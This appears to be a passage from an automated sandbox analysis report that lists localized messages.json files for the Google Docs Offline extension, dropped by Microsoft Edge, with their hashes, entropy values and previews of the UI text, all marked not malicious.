                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                  Malicious:false
